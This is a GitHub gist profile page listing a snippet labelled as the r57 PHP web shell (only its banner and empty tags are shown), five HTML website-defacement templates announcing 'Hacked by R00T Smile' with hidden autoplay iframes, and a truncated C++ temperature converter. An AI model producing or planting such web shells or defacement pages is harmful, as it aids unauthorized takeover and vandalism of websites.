Skip to content

Instantly share code, notes, and snippets.

View fakhrikmt's full-sized avatar

Fakhri Kmt fakhrikmt

View GitHub Profile
@fakhrikmt
fakhrikmt / r57.php
Created August 16, 2017 07:11
Shell r57
<?php
/******************************************************************************************************/
/* WW.R57.GEN.TR
/* # # # #
/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##g
<html>
<head>
<title></title>
<style></style>
<iframe></iframe>
</head>
<body>
<h1><h1>
<img>
<font></font>
@fakhrikmt
fakhrikmt / script_deface1.html
Created May 31, 2018 09:16
Script Deface 1
<html>
<head>
<title>Hacked by (Nama Underground Lu)</title>
<iframe width="1" height="1" src="https://www.youtube.com/embed/llxt1iLUK6c?rel=0&amp;autoplay=1&amp;loop=3" frameborder="0" allowfullscreen></iframe>
</head>
<body bgcolor="black" >
<center><font face="Courier new" size="24" color="lime"> Hacked by R00T Smile </font>
@fakhrikmt
fakhrikmt / script_deface2.html
Created May 31, 2018 09:17
Script Deface 2
<br><img src="https://4.bp.blogspot.com/-XfIJKnDoFQo/WMJUdCsJaaI/AAAAAAAAAEo/Lm3TG8UnqsUsO812_SdX7akXy4uImDK6wCLcB/s1600/root.png"width="300"height="300">
@fakhrikmt
fakhrikmt / script_deface3.html
Created May 31, 2018 09:42
Script Deface 3
<br><h1><span style="color:#ffffff;font-family:Iceland;text-shadow:#FF0099 0px 0px 10px">[+] Hacked by R0sX_010 [+]</span></h1>
@fakhrikmt
fakhrikmt / script_deface4.html
Last active May 31, 2018 09:44
Script Deface 4
<font face="Courier new" size="6" color="red"> Thanks to : </font>
<br>
<marquee behavior="scroll" direction="left" scrollamount="4" scrolldelay="55" width="100%">
<font face="Courier New" size="5" font style="text-shadow: 0px 0px 20px blue;" color="white">
<b>-=| Tuhan Maha Esa, R00T Smile, Ortu, Teman2, Keluarga |=-</font>
</body>
</html>
@fakhrikmt
fakhrikmt / script_deface5.html
Created May 31, 2018 09:45
Script Deface 5
<html>
<head>
<title>Hacked by (Nama Underground Lu)</title>
<iframe width="1" height="1" src="https://www.youtube.com/embed/aKs12aro0b?rel=0&amp;autoplay=1&amp;loop=3" frameborder="0" allowfullscreen></iframe>
</head>
<body bgcolor="black" >
<center><font face="Courier new" size="24" color="lime"> Hacked by R00T Smile </font>
<br><img src="https://4.bp.blogspot.com/-XfIJKnDoFQo/WMJUdCsJaaI/AAAAAAAAAEo/Lm3TG8UnqsUsO812_SdX7akXy4uImDK6wCLcB/s1600/root.png"width="300"height="300">
<br><h1><span style="color:#ffffff;font-family:Iceland;text-shadow:#FF0099 0px 0px 10px">[+] Hacked by R0sX_010 [+]</span></h1>
<font face="Courier new" size="6" color="red"> Thanks to : </font>
@fakhrikmt
fakhrikmt / conversi_suhu.cpp
Created June 6, 2018 08:53
Konversi Suhu Dengan C++
#include <iostream.h>
#include <conio.h>
using namespace std;
int main()
{
float C,F,K,R;
cout<<"\t=== PROGRAM KONVERSI SUHU ==="<<endl;
cout<<"\t FAKHRIKMT.BLOGSPOT.COM"<<endl<<endl;
cout<<"Masukkan Nilai Celciusnya = ";